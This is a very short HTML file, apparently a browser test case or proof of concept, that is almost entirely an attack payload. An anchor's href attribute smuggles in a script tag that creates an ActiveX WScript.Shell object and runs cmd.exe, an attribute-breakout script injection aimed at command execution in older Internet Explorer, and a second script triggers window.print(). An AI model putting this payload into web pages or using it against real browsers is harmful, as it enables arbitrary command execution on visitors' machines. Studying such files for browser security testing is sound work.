<html>
<body>
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('cmd.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>

